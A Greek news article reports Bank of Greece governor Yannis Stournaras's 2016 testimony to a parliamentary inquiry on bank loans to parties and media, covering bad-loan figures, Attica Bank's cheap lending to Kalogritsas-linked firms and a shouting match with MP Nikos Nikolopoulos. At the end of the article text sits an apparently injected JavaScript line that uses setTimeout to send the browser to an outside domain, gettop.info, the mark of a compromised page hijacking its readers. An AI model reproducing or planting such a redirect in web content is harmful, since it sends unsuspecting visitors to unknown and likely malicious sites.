Στουρνάρας: Η Τράπεζα Αττικής δανειοδοτούσε τον Καλογρίτσα λες και ήταν η Microsoft

0
10
O διοικητής της Τράπεζας της Ελλάδος Γιάννης Στουρνάρας μιλάει στη συνεδρίαση της εξεταστικής επιτροπής για τη διερεύνηση της νομιμότητας της δανειοδότησης των πολιτικών κομμάτων, καθώς και των ιδιοκτητριών εταιρειών μέσων μαζικής ενημέρωσης, στη Βουλή, Τρίτη 11 Οκτωβρίου2016. ΑΠΕ-ΜΠΕ /ΑΠΕ-ΜΠΕ/ ΑΛΕΞΑΝΔΡΟΣ ΜΠΕΛΤΕΣ

Ολοκληρώθηκε μετά από περίπου εννιά ώρες, η κατάθεση του διοικητή της Τράπεζας της Ελλάδος Γιάννη Στουρνάρα στην Εξεταστική Επιτροπή που διερευνά την νομιμότητα των δανείων από τράπεζες σε κόμματα και ΜΜΕ.

Η πολύωρη κατάθεση του Γιάννη Στουρνάρα, χαρακτηρίστηκε από συνεχείς εντάσεις και υψηλούς τόνους τόσο ανάμεσα στον ίδιο και τους βουλευτές της κυβερνητικής πλειοψηφίας όσο και μεταξύ των βουλευτών.

Αρκετές φορές σημειώθηκαν έντονες λεκτικές αντιπαραθέσεις, μεταξύ των βουλευτών της κυβερνητικής πλειοψηφίας και βουλευτών της ΝΔ και του ΠΑΣΟΚ, με τους πρώτους να κάνουν λόγο για προσπάθεια απαξίωσης του σκοπού της Εξεταστικής και να τους καταλογίζουν επικοινωνιακές τακτικές, και τους δεύτερους να τους κατηγορούν για σκοπιμότητες να υποστηρίζουν ότι ήδη έχουν βγάλει το πόρισμα τους.

Σύμφωνα με στοιχεία που κατέθεσε ο διοικητή της Τράπεζας της Ελλάδος και αφορούν το πρώτο εξάμηνο του 2016, τα μη εξυπηρετούμενα δάνεια είναι 41,5%, διευκρινίζοντας ότι σε σύνολο 289 εκατ. ευρώ, μη εξυπηρετούμενα είναι τα 108 εκατ. ευρώ.

Από το σύνολο των δανείων σύμφωνα με τα ίδια στοιχεία, τα 41,8 εκατ. ευρώ αφορούν στεγαστικά, τα 55,4 εκατ. ευρώ καταναλωτικά και τα 55,3 εκατ. ευρώ επιχειρηματικά ενώ επισφαλή είναι περίπου 67,2 εκατ. ευρώ. Αυτό αφορά ανά κλάδο, το 59% μικρές επιχειρήσεις, το 29% μικρομεγάλες επιχειρήσεις και το 27,4% τη ναυτιλία.

Για τα δάνεια των κομμάτων, ο Γιάννης Στουρνάρας επεσήμανε ότι ήταν υψηλού κινδύνου από την στιγμή που γινόταν η εκχώρηση της επιχορήγησης πέραν της κοινοβουλευτικής θητείας. Όμως, την περίοδο των «παχέων αγελάδων», όπως είπε, δεν μπορούσε να εκτιμηθεί από τις τράπεζες ότι θα άλλαζε ο συσχετισμός των κοινοβουλευτικών δυνάμεων.

Ο διοικητής της ΤτΕ υποστήριξε ότι «σήμερα μπορούμε με ευκολία να πούμε για τα λάθη του παρελθόντος σε ότι αφορά την ευκολία που χορηγούσαν οι τράπεζες τα δάνεια», προσθέτοντας ότι, οι ελληνικές τράπεζες ήταν πάντως πολύ πιο συντηρητικές σε σχέση με άλλες ευρωπαϊκές τράπεζες σε ότι αφορά τους όρους και τους κανόνες για την έγκριση τους.

«Σήμερα μπορούμε να πούμε ήταν λάθος. Οι ελληνικές, όμως τράπεζες, ήταν οι πιο συντηρητικές στις πρακτικές τους, σε σχέση με άλλες ευρωπαϊκές τράπεζες, πέρα από τα όποια λάθη που έκαναν. Το ελληνικό τραπεζικό σύστημα πέρασε έξι crash test», σημείωσε.

Σε ότι αφορά τα δάνεια των ΜΜΕ, ανέφερε ότι το σύνολο των οφειλών τους είναι ύψους 844 εκατ. ευρώ, ενώ το σύνολο των καλύψεων τους είναι στα 250 εκατ. ευρώ, χωρίς να συμπεριλαμβάνονται οι αξίες των ταινιοθηκών τους.

Για την «Τράπεζα Αττικής», επεσήμανε ότι λειτουργούσε έξω από το τραπεζικό πλαίσιο και τους κανόνες και ότι η κατάσταση ομαλοποιήθηκε μετά τον Ιούνιο του 2015, όταν συμμορφώθηκε, μετά από την πίεση που άσκησε η ΤτΕ για τον αυστηρότερο έλεγχο των δανείων που χορηγούσαν.
Αναφορικά με την Τράπεζα Αττικής ο διοικητής της ΤτΕ τόνισε ότι η κίνηση της Τράπεζα της Ελλάδος να σταματήσει τη χρηματοδότηση μέχρι να αλλάξει η διοίκηση είναι απόφαση εποπτείας της κεντρικής τράπεζας καθώς κρίθηκε ότι η διοίκηση ήταν ακατάλληλη .

Αιχμές πάντως άφησε κατά του προκατόχου του στη θέση του διοικητή της ΤτΕ. «Ο κος Προβόπουλος είχε τη δυνατότητα να καθαρίσει κατά τη διάρκεια της θητείας του με την Τράπεζα Aττικής. Δεν το έκανε και το έκανα εγώ».

Προσπάθησα να κινηθώ νωρίτερα στην Αττικής. Είδαμε ότι δεν υπάρχει ανταπόκριση. Δοκιμάσαμε δια της πειθούς όταν είδαμε ότι δεν υπήρξε ανταπόκριση προχωρήσαμε σε πιο σκληρές κινήσεις.
«Η πορεία της Τράπεζας Αττικής ήταν λάθος. Πήγαινε στα βράχια. Τώρα είναι σε πορεία ανάκαμψης».

Σταμάτης: από πότε αρχίσατε να ανησυχείτε και ζητήσατε να μπει άλλος στη θέση δ/ντος συμβούλου κι άλλος πρόεδρος; Ηταν σωστή η στάση της τράπεζας απέναντι στον κ. Καλογρίτσα; Δώθηκαν 80 εκ ευρώ μέσα σε ένα χρόνο και συνολικά 127 εκ ευρώ.

Στουρνάρας: εμείς δεν βλέπουμε Καλογρίτσα αλλά ομίλους πχ Τοξότης – από εκεί και πέρα το πόρισμα ανέδειξε ορισμένες αδυναμίες της τράπεζας και η νομική υπηρεσία είπε να πάει εισαγγελέας λόγω της ζημιάς από υποτιμολόγηση δανείου – και του κ. Καλογρίτσα αλλά όχι μόνο αυτού –. Το 61% του χαρτοφυλακίου της τράπεζας υποτιμολογείται κυρίως για δάνεια επιχειρηματικά και σε κατασκευαστικές. Δεν ακολούθησε το σύστημα τιμολόγησης. Εδιναν επιτόκιο χαμηλό σε εταιρίες σαν να ήταν η Microsoft

Ο κεντρικός τραπεζίτης ανέφερε ότι το σύνολο των «κόκκινων» δανείων αλλά και όσων έχουν χαρακτηριστεί ως επικίνδυνα για «κοκκίνισμα» ανέρχεται σε 45%. Ειδικότερα, το 67,2% αφορά επαγγελματίες, 59,9% μικρομεσαίες επιχειρήσεις, το 29,1% τις μεγάλες επιχειρήσεις, το 27,4% την ναυτιλία και το 25% τις επιχειρήσεις ΜΜΕ.

«Από τα 1,311 δισ. ευρώ δανείων προς ΜΜΕ τα καταγγελμένα είναι 319 εκατ. ευρώ, το 25%, σύμφωνα με τα τελευταία διαθέσιμα στοιχεία που αφορούν τον Ιούνιο του 2015» είπε χαρακτηριστικά ο κ. Στουρνάρας. Επίσης σύμφωνα με τα στοιχεία που έχουμε οι μέτοχοι έχουν εισφέρει τα τελευταία χρόνια στις επιχειρήσεις τους πάνω από 400 εκατ. ευρώ».

Τα στοιχεία του διοικητή προκάλεσαν αντιδράσεις από τους βουλευτές του ΣΥΡΙΖΑ που υποστήριξαν ότι ο όγκος των καταγγελμένων δανείων των ΜΜΕ είναι μεγαλύτερος και αγγίζει σχεδόν το 50% του συνολικού δανεισμού προς τον συγκεκριμένο κλάδο.

Ταυτόχρονα, εξέφρασε την πλήρη εμπιστοσύνη του στο νέο διοικητικό συμβούλιο που ανέλαβε τα ηνία της «Τράπεζας Αττικής», τονίζοντας ότι «με μια τέτοια διοίκηση έχει μεγάλη πιθανότητα ανόδου».

Ακόμα, ο Γιάννης Στουρνάρας μίλησε για άριστες σχέσεις που έχει με τον υπουργό Οικονομικών Ευκλείδη Τσακαλώτο, ενώ χαρακτήρισε καλές τις σχέσεις του με τον κ. Προβόπουλο διευκρινίζοντας ότι ήταν χαριτολόγημα τα όσα ανέφερε το πρωί, περί ψυχολογικών προβλημάτων του.

«Είναι δικό μου θέμα ποιον προσκαλώ στο γραφείο μου» του απάντησε ο Γιάννης Στουρνάρας.

«Στο σπίτι σας να τα κάνετε τα ραντεβού. Όχι στην ΤτΕ με τα λεφτά του ελληνικού λαού. Να πληρώνουμε εμείς για να καλείς όποιον θέλεις. Με τα λεφτά των Ελλήνων είσαι εκεί», του αντέτεινε ο Νίκος Νικολόπουλος.

«Και εσύ το ίδιο. Ντροπή σου. Σας ξέρω καλά ποιος είστε. Κρινόμαστε όλοι», του απάντησε ο Γιάννης Στουρνάρας.

«Και εγώ και ο ελληνικός λαός σε ξέρουμε εσένα. Κατέβα σε εκλογές να σε δούμε. Πάντα διορισμένος ήσουν. Παιδί του σωλήνα», συνέχισε ο Νίκος Νικολόπουλος.

Ο Γιάννης Στουρνάρας ζήτησε να μάθει από γνωρίζει για τις συναντήσεις του αυτές, για να εισπράξει την απάντηση «είναι πολλά τα μάτια».

«Αν δεχθώ νέα επίθεση δεν θα την αφήσω έτσι και θα απαντήσω. Θα σταματήσω να είμαι του σαλονιού και θα γίνω του αλωνιού», διαμαρτυρήθηκε ο Γ. Στουρνάρας απευθυνόμενος προς τον πρόεδρο της Εξεταστικής, ο οποίος παρενέβη και έδωσε τέλος στο επεισόδιο. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here